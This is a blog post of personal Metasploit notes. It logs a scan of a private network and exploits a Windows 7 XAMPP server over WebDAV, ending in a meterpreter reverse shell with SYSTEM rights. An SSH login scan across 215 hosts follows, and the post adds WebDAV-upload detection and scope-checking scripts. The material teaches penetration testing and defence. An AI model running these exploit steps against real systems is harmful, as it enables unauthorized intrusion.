Metasploit Usage Notes

Posted on 2023-05-10  2.4k views


Author: Scanz

Version: V1 (first draft 20180428, formatting to be updated)

Personal usage log

----------------------------------------------

~# /etc/init.d/postgresql start

~# msfdb init

~# msfconsole

 

msf > db_status

[*] postgresql connected to msf

 

msf > load nessus

[*] Nessus Bridge for Metasploit

[*] Type nessus_help for a command listing

[*] Successfully loaded plugin: Nessus

 

msf > nessus_connect  'user':'passwd'@127.0.0.1:8834

[*] Connecting to https://127.0.0.1:8834/ as user

[*] User user authenticated successfully

 

auxiliary/scanner/discovery/arp_sweep

 

 

root@kali:~# apt-cache show metasploit-framework | tail -n 6
Description: Framework for exploit development and vulnerability research
 The Metasploit Framework is an open source platform that supports
 vulnerability research, exploit development, and the creation of custom
 security tools.
Description-md5: c5f73085c4e31aa2cc01dd312ce844cc

root@kali:~#

 

root@kali:~# msfconsole

 

msf > workspace -a msftest
[*] Added workspace: msftest
msf >
 

msf > db_nmap -F 192.168.0.1-10
 

 

msf > hosts

Hosts
=====

address      mac                name     os_name  os_flavor  os_sp  purpose  info  comments
-------      ---                ----     -------  ---------  -----  -------  ----  --------
192.168.0.1  80:c6:ca:00:bf:e8           Unknown                    device
192.168.0.2  84:1b:5e:e5:66:ae           Unknown                    device
192.168.0.3  84:16:f9:9a:82:51           Unknown                    device
192.168.0.6  00:0c:29:2b:61:e1           Unknown                    device
192.168.0.7  b8:27:eb:89:ac:c3  pi-hole  Unknown                    device
192.168.0.8  0c:51:01:e1:8d:27           Unknown                    device
192.168.0.9  78:ca:39:fe:0b:4c           Unknown                    device

msf > services

Services
========

host         port   proto  name              state   info
----         ----   -----  ----              -----   ----
192.168.0.1  22     tcp    ssh               open
192.168.0.1  53     tcp    domain            open
192.168.0.1  80     tcp    http              open
192.168.0.1  3000   tcp    ppp               closed
192.168.0.1  8080   tcp    http-proxy        closed
192.168.0.2  80     tcp    http              open
192.168.0.2  443    tcp    https             open
192.168.0.2  5000   tcp    upnp              open
192.168.0.3  80     tcp    http              open
192.168.0.6  21     tcp    ftp               open
192.168.0.6  80     tcp    http              open
192.168.0.6  135    tcp    msrpc             open
192.168.0.6  139    tcp    netbios-ssn       open
192.168.0.6  443    tcp    https             open
192.168.0.6  445    tcp    microsoft-ds      open
192.168.0.6  554    tcp    rtsp              open
192.168.0.6  3389   tcp    ms-wbt-server     open
 

 

msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > options

Module options (auxiliary/scanner/ssh/ssh_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    22               yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads
   TIMEOUT  30               yes       Timeout for the SSH probe

msf auxiliary(ssh_version) > services -u -p 22 -R

Services
========

host         port  proto  name  state  info
----         ----  -----  ----  -----  ----
192.168.0.1  22    tcp    ssh   open
192.168.0.7  22    tcp    ssh   open

RHOSTS => 192.168.0.1 192.168.0.7
 

msf auxiliary(ssh_version) > setg threads 10
threads => 10
msf auxiliary(ssh_version) > run

[*] 192.168.0.7:22        - SSH server version: SSH-2.0-OpenSSH_6.7p1 Raspbian-5+deb8u3 ( service.version=6.7p1 openssh.comment=Raspbian-5+deb8u3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Raspbian os.device=General os.family=Linux os.product=Linux os.version=8.0 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.0.1:22        - SSH server version: SSH-2.0-OpenSSH_3.9p1 ( service.version=3.9p1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
[*] Scanned 1 of 2 hosts (50% complete)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
 

msf auxiliary(ssh_version) > use auxiliary/scanner/http/http_version
msf auxiliary(http_version) > options

Module options (auxiliary/scanner/http/http_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  10               yes       The number of concurrent threads
   VHOST                     no        HTTP server virtual host

msf auxiliary(http_version) > services -u -p 80 -R

Services
========

host         port  proto  name  state  info
----         ----  -----  ----  -----  ----
192.168.0.1  80    tcp    http  open
192.168.0.2  80    tcp    http  open
192.168.0.3  80    tcp    http  open
192.168.0.6  80    tcp    http  open
192.168.0.7  80    tcp    http  open

RHOSTS => 192.168.0.1 192.168.0.2 192.168.0.3 192.168.0.6 192.168.0.7

msf auxiliary(http_version) > run

[*] 192.168.0.7:80 lighttpd/1.4.35 ( Debian Default Page )
[*] 192.168.0.2:80  ( 401-Basic realm="NETGEAR R6200" )
[*] 192.168.0.6:80 Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7 ( Powered by PHP/5.4.7, 302-http://192.168.0.6/xampp/ )
[*] 192.168.0.1:80 Apache ( 302-https://192.168.0.1:10443/manage/dashboard )
[*] Scanned 4 of 5 hosts (80% complete)
[*] 192.168.0.3:80 Router Webserver ( 401-Basic realm="TP-LINK AC750 WiFi Range Extender RE200" )
[*] Scanned 5 of 5 hosts (100% complete)
[*] Auxiliary module execution completed
 

 

msf auxiliary(http_version) > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    10               yes       The number of concurrent threads

msf auxiliary(smb_version) > services -u -p 445 -R

Services
========

host         port  proto  name          state  info
----         ----  -----  ----          -----  ----
192.168.0.6  445   tcp    microsoft-ds  open
192.168.0.8  445   tcp    microsoft-ds  open
192.168.0.9  445   tcp    microsoft-ds  open

RHOSTS => 192.168.0.6 192.168.0.8 192.168.0.9

msf auxiliary(smb_version) > run

[*] 192.168.0.6:445       - Host is running Windows 7 Professional SP1 (build:7601) (name:WIN7-X86) (workgroup:WORKGROUP )
[*] 192.168.0.9:445       - Host could not be identified: Apple Base Station (CIFS 4.32)
[*] 192.168.0.8:445       - Host could not be identified: Apple Base Station (CIFS 4.32)
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_version) > clear

 

 

 

msf auxiliary(smb_version) > hosts

Hosts
=====

address      mac                name         os_name  os_flavor  os_sp  purpose  info  comments
-------      ---                ----         -------  ---------  -----  -------  ----  --------
192.168.0.1  80:c6:ca:00:bf:e8  192.168.0.1  Unknown                    device
192.168.0.2  84:1b:5e:e5:66:ae  192.168.0.2  Unknown                    device
192.168.0.3  84:16:f9:9a:82:51  192.168.0.3  RE200                      router
192.168.0.6  00:0c:29:2b:61:e1  WIN7-X86     Windows                    device
192.168.0.7  b8:27:eb:89:ac:c3  pi-hole      Linux               8.0    server
192.168.0.8  0c:51:01:e1:8d:27               Unknown                    device
192.168.0.9  78:ca:39:fe:0b:4c               Unknown                    device

msf auxiliary(smb_version) > services -u

Services
========

host         port   proto  name              state  info
----         ----   -----  ----              -----  ----
192.168.0.1  22     tcp    ssh               open   SSH-2.0-OpenSSH_3.9p1
192.168.0.1  53     tcp    domain            open
192.168.0.1  80     tcp    http              open   Apache ( 302-https://192.168.0.1:10443/manage/dashboard )
192.168.0.2  80     tcp    http              open    ( 401-Basic realm="NETGEAR R6200" )
192.168.0.2  443    tcp    https             open
192.168.0.2  5000   tcp    upnp              open
192.168.0.3  80     tcp    http              open   Router Webserver ( 401-Basic realm="TP-LINK AC750 WiFi Range Extender RE200" )
192.168.0.6  21     tcp    ftp               open
192.168.0.6  80     tcp    http              open   Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7 ( Powered by PHP/5.4.7, 302-http://192.168.0.6/xampp/ )
192.168.0.6  135    tcp    msrpc             open
192.168.0.6  139    tcp    netbios-ssn       open
192.168.0.6  443    tcp    https             open
                  192.168.0.6  445    tcp    smb               open   Windows 7 Professional SP1 (build:7601) (name:WIN7-X86) (workgroup:WORKGROUP )                                               192.168.0.6  554    tcp    rtsp              open                                                                                                                                192.168.0.6  3389   tcp    ms-wbt-server     open                                                                                                                                192.168.0.6  5357   tcp    wsdapi            open                                                                                                                                192.168.0.6  49155  tcp    unknown           open                                                                                                                                192.168.0.6  49156  tcp    unknown           open                                                                                                                                192.168.0.7  22     tcp    ssh               open   SSH-2.0-OpenSSH_6.7p1 Raspbian-5+deb8u3                                                                                      192.168.0.7  53     tcp    domain            open                                                                                                                                192.168.0.7  80     tcp    http              open   lighttpd/1.4.35 ( Debian Default Page )                                                                                      192.168.0.8  139    tcp    netbios-ssn       open                                                                                                                                192.168.0.8  445    tcp    smb               open   Apple Base Station (CIFS 4.32)                                                                                               192.168.0.8  548    tcp    afp     
          open                                                                                                                                192.168.0.8  5009   tcp    airport-admin     open                                                                                                                                192.168.0.8  10000  tcp    snet-sensor-mgmt  open                                                                                                                                192.168.0.9  139    tcp    netbios-ssn       open                                                                                                                                192.168.0.9  445    tcp    smb               open   Apple Base Station (CIFS 4.32)                                                                                               192.168.0.9  548    tcp    afp               open                                                                                                                                192.168.0.9  5009   tcp    airport-admin     open                                                                                                                                192.168.0.9  10000  tcp    snet-sensor-mgmt  open                                                                                                                                                                                                                                                                                                                 
 

msf auxiliary(smb_version) > services 192.168.0.6

Services
========

host         port   proto  name           state  info
----         ----   -----  ----           -----  ----
192.168.0.6  21     tcp    ftp            open
192.168.0.6  80     tcp    http           open   Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7 ( Powered by PHP/5.4.7, 302-http://192.168.0.6/xampp/ )
192.168.0.6  135    tcp    msrpc          open
192.168.0.6  139    tcp    netbios-ssn    open
192.168.0.6  443    tcp    https          open
192.168.0.6  445    tcp    smb            open   Windows 7 Professional SP1 (build:7601) (name:WIN7-X86) (workgroup:WORKGROUP )
192.168.0.6  554    tcp    rtsp           open
192.168.0.6  3389   tcp    ms-wbt-server  open
192.168.0.6  5357   tcp    wsdapi         open
192.168.0.6  49155  tcp    unknown        open
192.168.0.6  49156  tcp    unknown        open
 

 

 

msf auxiliary(smb_version) > search xampp
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                          Disclosure Date  Rank       Description
   ----                                          ---------------  ----       -----------
   exploit/windows/http/xampp_webdav_upload_php  2012-01-14       excellent  XAMPP WebDAV PHP Upload

msf auxiliary(smb_version) > use exploit/windows/http/xampp_webdav_upload_php
msf exploit(xampp_webdav_upload_php) > options

Module options (exploit/windows/http/xampp_webdav_upload_php):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME                   no        The filename to give the payload. (Leave Blank for Random)
   PASSWORD  xampp            no        The HTTP password to specify for authentication
   PATH      /webdav/         yes       The path to attempt to upload
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                      yes       The target address
   RPORT     80               yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME  wampp            no        The HTTP username to specify for authentication
   VHOST                      no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(xampp_webdav_upload_php) > set rhost 192.168.0.6
rhost => 192.168.0.6
 

 

msf exploit(xampp_webdav_upload_php) > show payloads

Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   generic/custom                                       normal  Custom Payload
   generic/shell_bind_tcp                               normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                            normal  Generic Command Shell, Reverse TCP Inline
   php/bind_perl                                        normal  PHP Command Shell, Bind TCP (via Perl)
   php/bind_perl_ipv6                                   normal  PHP Command Shell, Bind TCP (via perl) IPv6
   php/bind_php                                         normal  PHP Command Shell, Bind TCP (via PHP)
   php/bind_php_ipv6                                    normal  PHP Command Shell, Bind TCP (via php) IPv6
   php/download_exec                                    normal  PHP Executable Download and Execute
   php/exec                                             normal  PHP Execute Command
   php/meterpreter/bind_tcp                             normal  PHP Meterpreter, Bind TCP Stager
   php/meterpreter/bind_tcp_ipv6                        normal  PHP Meterpreter, Bind TCP Stager IPv6
   php/meterpreter/bind_tcp_ipv6_uuid                   normal  PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   php/meterpreter/bind_tcp_uuid                        normal  PHP Meterpreter, Bind TCP Stager with UUID Support
   php/meterpreter/reverse_tcp                          normal  PHP Meterpreter, PHP Reverse TCP Stager
   php/meterpreter/reverse_tcp_uuid                     normal  PHP Meterpreter, PHP Reverse TCP Stager
   php/meterpreter_reverse_tcp                          normal  PHP Meterpreter, Reverse TCP Inline
   php/reverse_perl                                     normal  PHP Command, Double Reverse TCP Connection (via Perl)
   php/reverse_php                                      normal  PHP Command Shell, Reverse TCP (via PHP)
 

msf exploit(xampp_webdav_upload_php) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(xampp_webdav_upload_php) > options

Module options (exploit/windows/http/xampp_webdav_upload_php):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME                   no        The filename to give the payload. (Leave Blank for Random)
   PASSWORD  xampp            no        The HTTP password to specify for authentication
   PATH      /webdav/         yes       The path to attempt to upload
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST     192.168.0.6      yes       The target address
   RPORT     80               yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME  wampp            no        The HTTP username to specify for authentication
   VHOST                      no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
 

msf exploit(xampp_webdav_upload_php) > set lhost 192.168.0.15
lhost => 192.168.0.15
msf exploit(xampp_webdav_upload_php) > exploit

[*] Started reverse TCP handler on 192.168.0.15:4444
[*] Uploading Payload to /webdav/3vfkVff.php
[*] Attempting to execute Payload
[*] Sending stage (33986 bytes) to 192.168.0.6
[*] Meterpreter session 1 opened (192.168.0.15:4444 -> 192.168.0.6:51211) at 2017-05-03 17:32:59 -0600
 

meterpreter> ps

304   taskeng.exe                 NT AUTHORITY\SYSTEM           taskeng.exe
348   csrss.exe                   NT AUTHORITY\SYSTEM           csrss.exe
388   wininit.exe                 NT AUTHORITY\SYSTEM           wininit.exe
400   csrss.exe                   NT AUTHORITY\SYSTEM           csrss.exe
448   winlogon.exe                NT AUTHORITY\SYSTEM           winlogon.exe
496   services.exe                NT AUTHORITY\SYSTEM           services.exe
504   lsass.exe                   NT AUTHORITY\SYSTEM           lsass.exe
512   lsm.exe                     NT AUTHORITY\SYSTEM           lsm.exe
612   svchost.exe                 NT AUTHORITY\SYSTEM           svchost.exe
628   xampp-control.exe           WIN7-X86\victim               xampp-control.exe
676   vmacthlp.exe                NT AUTHORITY\SYSTEM           vmacthlp.exe
708   svchost.exe                 NT AUTHORITY\NETWORK SERVICE  svchost.exe
760   svchost.exe                 NT AUTHORITY\LOCAL SERVICE    svchost.exe
820   LogonUI.exe                 NT AUTHORITY\SYSTEM           LogonUI.exe
856   svchost.exe                 NT AUTHORITY\SYSTEM           svchost.exe
896   svchost.exe                 NT AUTHORITY\LOCAL SERVICE    svchost.exe
 

 

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter > sysinfo
Computer    : WIN7-X86
OS          : Windows NT WIN7-X86 6.1 build 7601 (Windows 7 Business Edition Service Pack 1) i586
Meterpreter : php/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.6 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(xampp_webdav_upload_php) > exit
root@kali:~# # excellent :)
root@kali:~#
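The session above leaves a recognizable trace on the web server: an authenticated PUT of a .php file under /webdav/ followed by a request for the same file. The detection sketch below is an added example, not part of the original notes; it assumes Apache "combined" access logs, the sample log lines are constructed, and the extension list and five-minute window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Apache "combined" layout (assumed): host ident user [time] "request" status size ...
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
DAV_PREFIX = "/webdav/"                          # PATH option shown in the module output
SCRIPT_EXTENSIONS = (".php", ".phtml", ".php5")  # assumption: handlers the server executes
DEFAULT_ACCOUNTS = {"wampp"}                     # USERNAME default shown in the module output
EXEC_WINDOW = timedelta(minutes=5)               # assumption: upload-to-request window

# Constructed sample log lines (not captured from a real server).
SAMPLE_LOG = [
    '192.168.0.20 - - [03/May/2017:17:30:11 -0600] "GET /xampp/ HTTP/1.1" 200 1204 "-" "Mozilla/5.0"',
    '192.168.0.21 - alice [03/May/2017:17:31:02 -0600] "PUT /webdav/notes.txt HTTP/1.1" 201 - "-" "davfs2/1.5"',
    '192.168.0.15 - - [03/May/2017:17:32:57 -0600] "PUT /webdav/3vfkVff.php HTTP/1.1" 401 381 "-" "Mozilla/4.0"',
    '192.168.0.15 - wampp [03/May/2017:17:32:58 -0600] "PUT /webdav/3vfkVff.php HTTP/1.1" 201 - "-" "Mozilla/4.0"',
    '192.168.0.15 - - [03/May/2017:17:32:59 -0600] "GET /webdav/3vfkVff.php HTTP/1.1" 200 - "-" "Mozilla/4.0"',
]


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    match = LINE_RE.match(line)
    if match is None:
        return None
    event = match.groupdict()
    event["time"] = datetime.strptime(event["time"], "%d/%b/%Y:%H:%M:%S %z")
    event["status"] = int(event["status"])
    event["path"] = event["path"].split("?", 1)[0]  # ignore the query string
    return event


def detect_webdav_script_upload(lines):
    """Flag successful script uploads over WebDAV and later requests for them."""
    uploads = {}  # lower-cased path -> upload event
    alerts = []
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue
        key = event["path"].lower()  # Windows paths are case-insensitive
        if not (key.startswith(DAV_PREFIX) and key.endswith(SCRIPT_EXTENSIONS)):
            continue
        if event["method"] == "PUT" and event["status"] in (201, 204):
            uploads[key] = event
            alerts.append({
                "rule": "webdav-script-upload",
                "client": event["host"],
                "user": event["user"],
                "path": event["path"],
                "default_account": event["user"] in DEFAULT_ACCOUNTS,
            })
        elif event["method"] in ("GET", "POST") and key in uploads \
                and event["status"] < 400:
            delta = event["time"] - uploads[key]["time"]
            if timedelta(0) <= delta <= EXEC_WINDOW:
                alerts.append({
                    "rule": "webdav-script-executed",
                    "client": event["host"],
                    "path": event["path"],
                    "seconds_after_upload": delta.total_seconds(),
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_webdav_script_upload(SAMPLE_LOG):
        print(alert)
```

The `default_account` flag marks uploads authenticated with the account name the module options list as its default, which is worth a separate check that the WebDAV credentials on the server have been changed or the WebDAV share disabled.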
 

 

 

RHOSTS            file:/tmp/msf-db-rhosts-20171109-128530-1v0kofq

RHOSTS file format: list the IP addresses in the file, one IP per line.

 

 

msf auxiliary(scanner/ssh/ssh_login) > run

[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.

msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS file:///opt/pass/ip

RHOSTS => file:///opt/pass/ip

msf auxiliary(scanner/ssh/ssh_login) > run

 

 

 

[*] Scanned  22 of 215 hosts (10% complete)

[*] Scanned  45 of 215 hosts (20% complete)

[*] Scanned  65 of 215 hosts (30% complete)

[*] Scanned  87 of 215 hosts (40% complete)

[*] Scanned 109 of 215 hosts (50% complete)

[*] Scanned 129 of 215 hosts (60% complete)

[*] Scanned 152 of 215 hosts (70% complete)

[*] Scanned 173 of 215 hosts (80% complete)
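A pre-flight check for the RHOSTS target file described above, as an added example that is not part of the original notes: it enforces the one-IP-per-line rule, reports bad lines by number, drops duplicates, and rejects addresses outside an authorized scope. The scope list and the sample entries are constructed assumptions.

```python
import ipaddress

# Constructed sample file content; the page's rule is one IP address per line.
SAMPLE_RHOSTS = [
    "192.168.0.6",
    "192.168.0.7 ",             # trailing whitespace is tolerated
    "",                         # blank lines are skipped
    "192.168.0.300",            # not a valid address
    "192.168.0.0/24",           # a network, not a single IP
    "10.0.0.5",                 # valid, but outside the engagement scope
    "192.168.0.6",              # duplicate
    "192.168.0.1-192.168.0.9",  # a range, not a single IP
]
AUTHORIZED_SCOPE = ["192.168.0.0/24"]  # assumption: networks you are permitted to test


def check_rhosts(lines, allowed_scope):
    """Return (targets, rejected); rejected holds (line_number, entry, reason)."""
    scope = [ipaddress.ip_network(net) for net in allowed_scope]
    targets, rejected, seen = [], [], set()
    for lineno, raw in enumerate(lines, start=1):
        entry = raw.strip()
        if not entry:
            continue
        try:
            ip = ipaddress.ip_address(entry)
        except ValueError:
            rejected.append((lineno, entry, "not a single IP address"))
            continue
        if not any(ip in net for net in scope):
            rejected.append((lineno, entry, "outside authorized scope"))
        elif ip in seen:
            rejected.append((lineno, entry, "duplicate"))
        else:
            seen.add(ip)
            targets.append(str(ip))
    return targets, rejected


def render_rhosts(targets):
    """Render the cleaned list in the one-IP-per-line layout."""
    return "".join(target + "\n" for target in targets)


if __name__ == "__main__":
    ok, bad = check_rhosts(SAMPLE_RHOSTS, AUTHORIZED_SCOPE)
    print(render_rhosts(ok), end="")
    for lineno, entry, reason in bad:
        print(f"line {lineno}: {entry!r} rejected ({reason})")
```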

 
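Articles on this site are shared under the international BY-NA-SA 4.0 license;
unless otherwise stated, all articles on this site are original. Please follow proper attribution practice when reposting.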
